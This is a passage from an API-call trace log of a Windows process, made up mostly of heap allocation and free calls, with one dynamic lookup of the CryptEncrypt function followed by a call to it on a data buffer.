lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0140.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0140.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0140.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50aa0 [0140.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0140.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.161] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0140.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0140.162] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2cfb0*, pdwDataLen=0x8cef60*=0x2a7d, dwBufLen=0x2a80 | out: pbData=0x2f2cfb0*, pdwDataLen=0x8cef60*=0x2a80) returned 1 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0140.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0140.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0140.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0140.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0140.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, 